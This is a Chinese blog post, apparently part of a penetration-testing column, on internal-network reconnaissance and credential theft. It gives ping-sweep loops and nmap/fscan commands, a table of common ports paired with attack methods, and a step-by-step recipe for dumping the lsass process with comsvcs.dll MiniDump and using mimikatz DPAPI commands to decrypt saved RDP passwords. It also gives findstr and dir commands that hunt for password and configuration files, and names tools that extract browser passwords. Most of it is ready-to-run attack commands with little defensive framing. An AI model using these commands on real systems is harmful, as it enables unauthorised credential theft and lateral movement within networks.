首页 > 其他分享 >2.2_内网IP&端口&密码抓取

2.2_内网IP&端口&密码抓取

时间:2024-11-13 09:20:16浏览次数:3  
标签:服务 凭据 爆破 IP lsass 专栏 2.2 内网 dir

  • 内网IP扫描


ICMP
命令
Windows
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.7.%I | findstr "TTL= #windows"
Linux
for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
工具
Nmap(推荐)sudo nmap -sn -PR 192.168.142.0/24
Fscan (推荐)主机发现+端口web服务检测+基础漏洞扫描
Kscan主机发现+端口扫描+协议检测+指纹识别
Fpingnbtscan,...其他工具内网扫描工具

ARP

(推荐)

命令Windows/Linux:arp -a
工具CS的端口扫描

NTBIOS

命令Linux:nbtscan -r 目标IP范围

nbtscan -r 192.168.1.1-254
工具CS的端口扫描

  • 内网端口扫描


  1. 扫描

    命令kalitelnet 快速检测单个端口有没有开放,例:telnet 192.168.142.128 80
    工具
    Nmap (推荐)nmap -sV -p- 192.168.110.151
    Fscan (推荐)端口web服务检测+基础漏洞扫描
    Kscan主机发现+端口扫描+协议检测+指纹识别
  2. 常见端口及描述

    端口号端口服务利用方式
    21,22,69FTP文件传输协议允许匿名的上传,下载,爆破和嗅探操作
    22SSH远程连接爆破,SSH隧道及内网代理转发,文件传输
    23Telnet 远程连接爆破,嗅探,弱口令
    25SMTP 邮件服务邮件伪造
    53DNS 域名系统允许区域传送,DNS劫持,缓存投毒,欺骗
    67,68DHCP 服务劫持,欺骗
    80,443,8080常见的 Web 服务端口Web 攻击,爆破,对应服务器版本漏洞
    110POP3协议爆破,嗅探
    139NTBIOS 服务爆破,未授权访问,远程代码执行
    512,513,514Linux rexec 服务畴爆破,远程登录
    873rsync 服务匿名访问,文件上传
    1352Lotus Domino 邮件服务弱口令,信息泄露,爆破
    1433MSSQL 数据库注入,提权,爆破
    1521Oracle 数据库注入,反弹shell
    2049NFS 服务配置不当
    2181ZooKeeper 服务未授权访问
    2375Docker 服务未授权访问
    3306MySQL 数据库注入,提权,爆破
    3389Telnet 远程连接爆破,嗅探,弱口令
    3690SVN 服务SVN 泄露,未授权访问
    4848GlassFish 控制台弱口令
    5432Post greSQL 数据库爆破,注入,弱口令
    5900,5901VNC弱口令爆破,未授权访问
    5984CouchDB未授权访问
    6379redis未授权访问
    7001WeblogicWeblogic 漏洞
    8069Zabbix 服务远程执行,SQL注入
    8080,8090JBoss/Resin/Jetty/Jenkins反序列化,控制台弱口令
    9090WebSphere 控制台Java 反序列化,弱口令
    9200,9300EI asticsearcb 服务远程执行
    10000webmin 控制面板弱口令
    11211Memcached 服务未授权访问
    27017,27018MongoDB 数据库爆破,未授权访问
    50000SAP Management Console远程执行

  • RDP 明文密码读取 


当用户点击了记住我的凭据,我们可以对保存的密码进行还原

查看凭据
  1. 被连接主机 查看mstsc的连接记录:cmdkey /list
  2. 查找本地的凭据文件:dir /a %userprofile%\appdata\local\microsoft\credentials\*
  3. 得到其凭据文件路径(绝对路径和文件名进行拼接)(记录)(记得更改用户名):C:\Users\admin\appdata\local\microsoft\credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
在线读取
  1. 目标主机 查看其 guidMasterKeymimikatz dpapi::cred /in:凭据文件路径
  2. 将凭据载入到内存 :mimikatz sekurlsa::minidump lsass.dmp
  3. 获取其 GUID:dpapi::cred /in:凭据文件路径
  4. 找到内存中对应的MasterKey(记录): sekurlsa::dpapi
  5. 解密凭证文件:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值
  6. CredentialBlob 出显示密码
离线读取
  1. 查看lsass.exe进程PID: tasklist | findstr lsass.exe
  2. 使用powershell 导出 lsass (需管理员权限):
    1. powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\Users\lenovo\Desktop\lsass.dmp full
    2. win10 使用 导出 lsass (需管理员权限):powershell -c 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full'
    3. lsass.dmp 下载到本地
  3. ↑ 下载其凭证操作 ↑
  4. (若其隐藏:查看 -> 选项 -> 查看 ->  取消勾选 隐藏受保护的操作系统文件(推荐) )
  5. 将凭据载入到内存 :mimikatz sekurlsa::minidump lsass.dmp
  6. 获取其 GUIDMasterKey:dpapi::cred /in:凭据文件路径
  7. 找到内存中对应的MasterKey(记录): sekurlsa::dpapi 
  8. 解密凭证文件:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值
  9. CredentialBlob 出显示密码

  • 软件密码抓取工具


类型工具
浏览器密码Sharp-HackBrowserData
FinallshellFinalShell-Decoder

  • 其他信息收集命令


# 指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt" 
dir /a /s /b d:\"*.xml" 
dir /a /s /b d:\"*.mdb" 
dir /a /s /b d:\"*.sql" 
dir /a /s /b d:\"*.mdf" 
dir /a /s /b d:\"*.eml" 
dir /a /s /b d:\"*.pst" 
dir /a /s /b d:\"*conf*" 
dir /a /s /b d:\"*bak*" 
dir /a /s /b d:\"*pwd*" 
dir /a /s /b d:\"*pass*" 
dir /a /s /b d:\"*login*" 
dir /a

# 指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

  • 免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!

标签:服务,凭据,爆破,IP,lsass,专栏,2.2,内网,dir
From: https://blog.csdn.net/m0_73983897/article/details/143725080

相关文章

  • 探索jQuery与原生JavaScript:事件绑定的比较
    探索jQuery与原生JavaScript:事件绑定的比较在现代网页开发中,事件处理是实现用户交互的关键部分。开发者可以选择使用原生JavaScript或jQuery来绑定事件。本文将通过一个简单的示例,比较这两种方法在事件绑定上的不同,并探讨它们的优缺点。事件绑定基础事件绑定是将事件监听......
  • javascript 流程控制,数组【知识点整理】
    javascriptJS流程控制条件控制语句循环语句跳转语句:异常处理:JS数组数组的方法JS流程控制条件控制语句if语句:用于在满足特定条件时执行代码块。if(condition){//如果条件为真,则执行代码块}if…else语句:在条件为真时执行一段代码,条件为假时执......
  • 基于Lipschitz李式指数的随机信号特征识别和故障检测matlab仿真
    1.程序功能描述基于Lipschitz李式指数的随机信号特征识别和故障检测.2.测试软件版本以及运行结果展示MATLAB2013B版本运行 3.核心程序%---Executesonbuttonpressinpushbutton2.functionpushbutton2_Callback(hObject,eventdata,handles)%hObjecthandle......
  • 多校A层冲刺NOIP2024模拟赛21
    以为150要垫底了,没想到还有高手。送信卒签,没一会就写完但因为交的太晚被猫娘抢了首A。恼火。简要题意给一个\(n\timesm(n,m\le100)\)的网格图,左右走的代价为\(1\),上下走的代价为\(k\),求最小的\(k\),使得\((sx,sy)\)到\((tx,ty)\)的代价恰好为\(s(s\le10^5)\)。数据保证有解......
  • 『模拟赛』多校A层冲刺NOIP2024模拟赛21
    Rank别样的,不好评价,烂完了A.送信卒签,我是唐氏。为什么呢题目没给最短路的定义,我赛时觉得最短路就是最短路径,于是直接bfs一遍随便加个check就做完了。当然过得那遍按我的思路来说是错的,然后我也发现了这一点,然后就改了,然后就WA了。总结:错误思路的错解是正确思路......
  • 查看ipad 电池健康度流程
    通过iPad分析数据查看电池健康度‌:打开“设置”>“隐私”>“分析与改进”>“共享iPad分析”。等待一天后,在“分析与改进”>“分析数据”中找到名字带有“Analytics-”的日志文件。拷贝并粘贴到备忘录中,搜索“last_value_CycleCount”和“last_value_AppleRawMaxCapacity”,就可......
  • 多校A层冲刺NOIP2024模拟赛21
    多校A层冲刺NOIP2024模拟赛21\(T1\)A.送信卒\(90pts/100pts\)部分分\(90pts\)设最后的可能的最短路中左右共移动了\(d\)次,上下共移动了\(x\)次。则等价于求\(\min\{x_{i}k+d_{i}\}=s\)的解,观察到\(d\in[0,\min(\left\lceil\frac{nm}{2}\right\rce......
  • pjsip编译、说明及vs2022使用示例
    环境:window10_x64&vs2022pjsip版本:2.14.1 之前整理过pjsip2.10的编译及python使用示例:https://www.cnblogs.com/MikeZhang/p/pjsip20210116.htmlhttps://www.cnblogs.com/MikeZhang/p/win10py3pjsua-20211010.html 今天整理下pjsip2.14.1的编译、接口说明,以及在vs......
  • noip模拟11
    A送信卒考场上唐了,把方向搞反导致挂零。。。然后就是跑一边bfs,算出来最短路,并且记录横纵位移,就好了。好像也可以二分然后去跑djikstra。其实有个hack,会让我的代码在特定情况下不稳定地输出错解:1010115500000000000111111110011100000......
  • NOIP模拟赛 #10
    ALuogu6472猜结论。B有\(n\)堆硬币,每堆有\(3\)枚,第\(i\)堆硬币从上到下价值分别为\(a_i,b_i,a_i\)。取若干个硬币,要求每堆必须先取上面再取下面,求分别取\(1,2,3,\dots,k\)枚硬币时的最大价值和。\(1\len\le5\times10^6,\1\lek\le3n\)对于第\(i\)堆,......